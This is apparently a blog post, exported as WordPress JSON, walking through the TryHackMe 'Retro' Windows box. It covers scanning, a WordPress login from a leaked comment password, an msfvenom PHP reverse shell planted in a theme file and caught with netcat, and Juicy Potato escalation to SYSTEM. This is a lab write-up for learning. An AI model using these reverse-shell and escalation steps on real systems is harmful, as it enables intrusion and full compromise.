﻿{"id":220,"date":"2020-06-19T20:32:16","date_gmt":"2020-06-19T12:32:16","guid":{"rendered":"https:\/\/byy3.com\/?p=220"},"modified":"2020-06-19T21:38:39","modified_gmt":"2020-06-19T13:38:39","slug":"retro-for-ctf-of-wordpress","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=220","title":{"rendered":"Retro for CTF of wordpress"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Retro\u00a0is a free Windows box offered .<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">What you\u2019ll learn<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>Importance of different wordlists<\/li><li>Consequence of SeImpersonatePrivilege<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Port scans<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">One thing I noticed with is that the openvpn tunnel created is a\u00a0<strong>tun0<\/strong>\u00a0interface, rather than\u00a0<strong>tap0<\/strong>\u00a0or the hypervisor-created\u00a0<strong>eth0<\/strong>. This poses some problems for Unicornscan which seems to work over a network-L2 interface but not a L3 one. This was discussed in a\u00a0HTB thread here. Unicornscan gave the error<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Send exiting main didnt connect, exiting: system error Interrupted system call<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Consequently I stuck with masscan, which worked for TCP scans. UDP scans, well are protocol-based and don\u2019t seem to work for most scanners, including nmap (<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/ivanitlearning.wordpress.com\/2020\/03\/03\/vulnhub-dev-random-scream\/\" rel=\"nofollow\" >see here<\/a>&nbsp;for an open TFTP port nmap didn\u2019t detect). 
nmap is probably your best chance though.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# masscan -p1-65535,U:1-65535 10.10.208.121 --rate=600 -e tun0\n\nStarting masscan 1.0.4 (http:\/\/bit.ly\/14GZzcT) at 2020-03-28 13:32:10 GMT\n -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth\nInitiating SYN Stealth Scan\nScanning 1 hosts [131070 ports\/host]\nDiscovered open port 80\/tcp on 10.10.208.198 \nDiscovered open port 3389\/tcp on 10.10.208.198 \n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Just two ports. Perfect. TCP service scan&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/ivanitlearning\/CTF-Repos\/blob\/master\/TryHackMe\/Retro\/nmap-TCP\" rel=\"nofollow\" >here<\/a>. There seems to be nothing special though, from the nmap results.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Web scans<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">This seemed to return nothing too.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">amap v5.4 (www.thc.org\/thc-amap) started at 2020-03-28 21:54:36 - APPLICATION MAPPING mode\n\nProtocol on 10.10.208.198:80\/tcp matches http\nProtocol on 10.10.208.198:80\/tcp matches http-apache-2\nProtocol on 10.10.208.198:80\/tcp matches http-iis\n\nUnidentified ports: none.\n\namap v5.4 finished at 2020-03-28 21:54:36\n\n\nroot@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/10.10.208.198:80 -w \/usr\/share\/dirb\/wordlists\/common.txt\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.208.198:80\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirb\/wordlists\/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/28 21:55:16 Starting 
gobuster\n===============================================================\n===============================================================\n2020\/03\/28 21:56:47 Finished\n===============================================================\n\nRouted through Burp, use old header\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\nroot@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/10.10.208.198:80 -w \/usr\/share\/dirb\/wordlists\/common.txt -p http:\/\/localhost:8081\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.208.198:80\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirb\/wordlists\/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] Proxy: http:\/\/localhost:8081\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/28 22:04:01 Starting gobuster\n===============================================================\n===============================================================\n2020\/03\/28 22:08:03 Finished\n===============================================================\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Took me some time, but apparently the wordlist I used was insufficient. 
If I had used&nbsp;<code>\/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt<\/code>&nbsp;instead, I would have found this.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/192.168.92.134:80 -w \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.218.121:80\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirbuster\/wordlists\/directory-list-2.3-medium.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/29 14:57:25 Starting gobuster\n===============================================================\n\/retro (Status: 301)\n\/Retro (Status: 301)\n===============================================================\n2020\/03\/29 14:57:43 Finished\n===============================================================\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">That, or I could somehow have got the hint that the name of the box might be an important Web path. 
Further scanning down this path gave<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# gobuster dir -u http:\/\/10.10.208.121:80\/retro -w \/usr\/share\/dirb\/wordlists\/common.txt\n===============================================================\nGobuster v3.0.1\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\n===============================================================\n[+] Url: http:\/\/10.10.208.121:80\/retro\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/dirb\/wordlists\/common.txt\n[+] Status codes: 200,204,301,302,307,401,403\n[+] User Agent: gobuster\/3.0.1\n[+] Timeout: 10s\n===============================================================\n2020\/03\/28 22:15:06 Starting gobuster\n===============================================================\n\/index.php (Status: 301)\n\/wp-admin (Status: 301)\n\/wp-content (Status: 301)\n\/wp-includes (Status: 301)\n===============================================================\n2020\/03\/28 22:16:39 Finished\n===============================================================\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">So we have a WP blog. 
But for some reason, with Burp as the proxy, I kept getting redirected to localhost:80, which of course loaded nothing, so I had to do this to redirect it back.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# ssh -L 80:10.10.208.121:80 localhost\nroot@localhost's password: \nLinux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64\n\nThe programs included with the Kali GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nKali GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nNo mail.\nLast login: Sat Mar 28 20:35:25 2020 from ::1\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">That\u2019s SSH local port forwarding, where you bind one of your own machine\u2019s ports to a port on a remote server,&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/help.ubuntu.com\/community\/SSH\/OpenSSH\/PortForwarding#Local_Port_Forwarding\" rel=\"nofollow\" >like<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ssh -L 8080:www.ubuntuforums.org:80 localhost<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now you can visit&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/localhost:8080\/\" rel=\"nofollow\" >http:\/\/localhost:8080<\/a>&nbsp;to go to&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.ubuntuforums.org\/\" rel=\"nofollow\" >http:\/\/www.ubuntuforums.org:80<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">After doing this I could visit&nbsp;<code><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.10.208.121\/retro\/wp-admin\" rel=\"nofollow\" >http:\/\/10.10.208.121\/retro\/wp-admin<\/a><\/code>. If you didn\u2019t encounter this problem, don\u2019t do this. After I upgraded Burp Suite, the problem stopped. 
The site looks like this<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/ivanitlearning.files.wordpress.com\/2020\/04\/4-wp-site.png?w=1024\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" class=\"wp-image-2340\" title=\"Retro for CTF of wordpress illustration\" alt=\"Retro for CTF of wordpress illustration\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Now I had to point all my scans at localhost:80. Since we have a WP site, I ran wpscan, which has annoyingly moved to a freemium model limited to 5 results per day. Results&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/ivanitlearning\/CTF-Repos\/blob\/master\/TryHackMe\/Retro\/wpscan.txt\" rel=\"nofollow\" >here<\/a>. This didn\u2019t lead anywhere, since the vulnerabilities identified were XSS or required that you already had some login access to the WP site.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WordPress login<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The only way forward was to notice this comment.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/ivanitlearning.files.wordpress.com\/2020\/04\/5-wade-comment.png?w=460\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" class=\"wp-image-2341\" title=\"Retro for CTF of wordpress illustration 1\" alt=\"Retro for CTF of wordpress illustration 1\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">which said<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Wade\nDecember 9, 2019\nLeaving myself a note here just in case I forget how to spell it: parzival<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If you try it on the WordPress admin login page (\/retro\/wp-login.php) it works (user: Wade, password: parzival).<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Exploitation<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Checking the Users section, we see quickly that Wade is a 
WP admin. Great.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/ivanitlearning.files.wordpress.com\/2020\/04\/6-wade-account-wp.png?w=1024\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" class=\"wp-image-2343\" title=\"Retro for CTF of wordpress illustration 2\" alt=\"Retro for CTF of wordpress illustration 2\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">That means we have rights to edit WP theme files and replace them with our own code. Typically the WordPress-to-shell exploitation vector requires two things.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Uploading a reverse Web shell.<\/li><li>LFI, or being able to browse to that shell so it executes.<\/li><\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">The theme used is 90\u2019s Retro. Going to Appearance -&gt; Theme Editor, we can choose whichever page to edit. The best choice is usually 404.php, since that page loads whenever a non-existent page is requested on the WP site, triggering the reverse shell. 
But this time, I chose another page,&nbsp;<strong>page.php<\/strong>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Now we just need a PHP reverse shell, so get it via msfvenom.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# msfvenom -a php --platform php -p php\/reverse_php LHOST=10.9.21.147 LPORT=443 -o shell.php\nNo encoder or badchars specified, outputting raw payload\nPayload size: 3044 bytes\nSaved as: shell.php\n<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" data-original=\"https:\/\/ivanitlearning.files.wordpress.com\/2020\/04\/3-exploit-replace-all-of-page.png?w=1024\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" class=\"wp-image-2345\" title=\"Retro for CTF of wordpress illustration 3\" alt=\"Retro for CTF of wordpress illustration 3\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Just copy and paste the entire PHP code, overwriting the existing code completely. Don\u2019t leave any of the original code behind. I say this because when I first did it, I couldn\u2019t get the reverse shell to trigger until I completely overwrote it. Ok, now we just need to find a way to view page.php. Where could that be?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Now I could access the twentynineteen theme\u2019s readme.txt here<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">http:\/\/10.10.218.121\/retro\/wp-content\/themes\/twentynineteen\/readme.txt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">so I just need to figure out the Web path for the 90\u2019s Retro theme. After some Googling, I found its&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/Invulu\/90s-retro\" rel=\"nofollow\" >GitHub repo<\/a>. The URL suggested the path could be&nbsp;<code>\/90s-retro\/<\/code>. 
Accessing&nbsp;<code><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/readme.txt\" rel=\"nofollow\" >http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/readme.txt<\/a><\/code>&nbsp;works! So the uploaded reverse shell would be at&nbsp;<code><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/page.php\" rel=\"nofollow\" >http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/page.php<\/a><\/code><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# curl http:\/\/10.10.218.121\/retro\/wp-content\/themes\/90s-retro\/page.php<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Our listener (I switched from port 53 to 443 with another shell)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# rlwrap -r nc -nlvp 443\nlistening on [any] 443 ...\nconnect to [10.9.21.147] from (UNKNOWN) [10.10.208.121] 52344\nwhoami &amp;&amp; ipconfig \/all\nnt authority\\iusr\n\nWindows IP Configuration\n\n Host Name . . . . . . . . . . . . : RetroWeb\n Primary Dns Suffix . . . . . . . : \n Node Type . . . . . . . . . . . . : Hybrid\n IP Routing Enabled. . . . . . . . : No\n WINS Proxy Enabled. . . . . . . . : No\n DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com\n eu-west-1.compute.internal\n\nEthernet adapter Ethernet:\n\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n Description . . . . . . . . . . . : AWS PV Network Device #0\n Physical Address. . . . . . . . . : 02-95-6F-53-23-2E\n DHCP Enabled. . . . . . . . . . . : Yes\n Autoconfiguration Enabled . . . . : Yes\n Link-local IPv6 Address . . . . . : fe80::8d1d:a2be:a594:99d7%5(Preferred) \n IPv4 Address. . . . . . . . . . . : 10.10.208.198(Preferred) \n Subnet Mask . . . . . . . . . . . : 255.255.0.0\n Lease Obtained. . . . . . . . . . : Saturday, March 28, 2020 6:29:56 AM\n Lease Expires . . . . . . . . . . 
: Saturday, March 28, 2020 8:29:56 AM\n Default Gateway . . . . . . . . . : 10.10.0.1\n DHCP Server . . . . . . . . . . . : 10.10.0.1\n DHCPv6 IAID . . . . . . . . . . . : 100805359\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28\n DNS Servers . . . . . . . . . . . : 10.0.0.2\n NetBIOS over Tcpip. . . . . . . . : Enabled\n\nTunnel adapter Teredo Tunneling Pseudo-Interface:\n\n Connection-specific DNS Suffix . : \n Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\n DHCP Enabled. . . . . . . . . . . : No\n Autoconfiguration Enabled . . . . : Yes\n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:ce5:276b:f5f5:2f39(Preferred) \n Link-local IPv6 Address . . . . . : fe80::ce5:276b:f5f5:2f39%2(Preferred) \n Default Gateway . . . . . . . . . : ::\n DHCPv6 IAID . . . . . . . . . . . : 134217728\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28\n NetBIOS over Tcpip. . . . . . . . : Disabled\n\nTunnel adapter isatap.eu-west-1.compute.internal:\n\n Media State . . . . . . . . . . . : Media disconnected\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\n DHCP Enabled. . . . . . . . . . . : No\n Autoconfiguration Enabled . . . . : Yes\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">As per other walkthroughs, the credentials work for RDP too, the other open port on the box. If you\u2019re going down that route, I prefer FreeRDP over rdesktop. This command is my go to<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# xfreerdp \/v:10.10.218.121:3389 \/u:Wade \/p:parzival \/size:90%<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Where \/size scales it to 90% of your desktop resolution. Experiment and see what works for you. 
Just for the record, I tried other PHP reverse shells such as&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/Dhayalanb\/windows-php-reverse-shell\" rel=\"nofollow\" >this<\/a>&nbsp;and Pentestmonkey\u2019s (replacing with cmd) but it didn\u2019t work. Only msfvenom\u2019s worked for me.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Post-exploitation<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">There are a few ways to achieve SYSTEM here. The intended method, explained&nbsp;<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/medium.com\/@MuirlandOracle\/retro-write-up-af8ba60bea17\" rel=\"nofollow\" >here<\/a>&nbsp;didn\u2019t work for me. What worked was a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First note our privileges (we are IUSR or the IIS user). winPEAS highlights this too.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name SID \n================= ========\nnt authority\\iusr S-1-5-17\n\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes \n==================================== ================ ============ ==================================================\nMandatory Label\\High Mandatory Level Label S-1-16-12288 \nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\SERVICE Well-known group S-1-5-6 Group used for deny only \nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group\n\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description 
State \n======================= ========================================= =======\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We have&nbsp;<strong>SeImpersonatePrivilege<\/strong>&nbsp;privileges. So that means we can use Juicy Potato. Call it like this<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">JuicyPotato.exe -l 443 -p C:\\inetpub\\wwwroot\\retro\\wp-content\\themes\\90s-retro\\temp\\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}\nTesting {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443\n......\n[+] authresult 0\n{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK\n<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We should get a SYSTEM shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@Kali:~\/TryHackme\/Retro# rlwrap -r nc -nlvp 443\nlistening on [any] 443 ...\nconnect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079\nMicrosoft Windows [Version 10.0.14393]\n(c) 2016 Microsoft Corporation. 
All rights reserved.\n\nC:\\Windows\\system32&gt;whoami \/priv &amp;&amp; ipconfig\nwhoami \/priv &amp;&amp; ipconfig\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State \n========================================= ================================================================== =======\nSeAssignPrimaryTokenPrivilege Replace a process level token Enabled\nSeLockMemoryPrivilege Lock pages in memory Enabled\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled\nSeTcbPrivilege Act as part of the operating system Enabled\nSeSecurityPrivilege Manage auditing and security log Enabled\nSeTakeOwnershipPrivilege Take ownership of files or other objects Enabled\nSeLoadDriverPrivilege Load and unload device drivers Enabled\nSeSystemProfilePrivilege Profile system performance Enabled\nSeSystemtimePrivilege Change the system time Enabled\nSeProfileSingleProcessPrivilege Profile single process Enabled\nSeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled\nSeCreatePagefilePrivilege Create a pagefile Enabled\nSeCreatePermanentPrivilege Create permanent shared objects Enabled\nSeBackupPrivilege Back up files and directories Enabled\nSeRestorePrivilege Restore files and directories Enabled\nSeShutdownPrivilege Shut down the system Enabled\nSeDebugPrivilege Debug programs Enabled\nSeAuditPrivilege Generate security audits Enabled\nSeSystemEnvironmentPrivilege Modify firmware environment values Enabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeUndockPrivilege Remove computer from docking station Enabled\nSeManageVolumePrivilege Perform volume maintenance tasks Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\nSeTimeZonePrivilege Change the time zone Enabled\nSeCreateSymbolicLinkPrivilege Create symbolic links 
Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled\n\nWindows IP Configuration\n\n\nEthernet adapter Ethernet:\n\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5\n IPv4 Address. . . . . . . . . . . : 10.10.218.121\n Subnet Mask . . . . . . . . . . . : 255.255.0.0\n Default Gateway . . . . . . . . . : 10.10.0.1\n\nTunnel adapter Teredo Tunneling Pseudo-Interface:\n\n Connection-specific DNS Suffix . : \n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586\n Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2\n Default Gateway . . . . . . . . . : ::\n\nTunnel adapter isatap.eu-west-1.compute.internal:\n\n Media State . . . . . . . . . . . : Media disconnected\n Connection-specific DNS Suffix . : eu-west-1.compute.internal\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Retro\u00a0is a free Windows box offered . 
What you\u2019ll learn [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-220","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/220","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=220"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/220\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=220"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}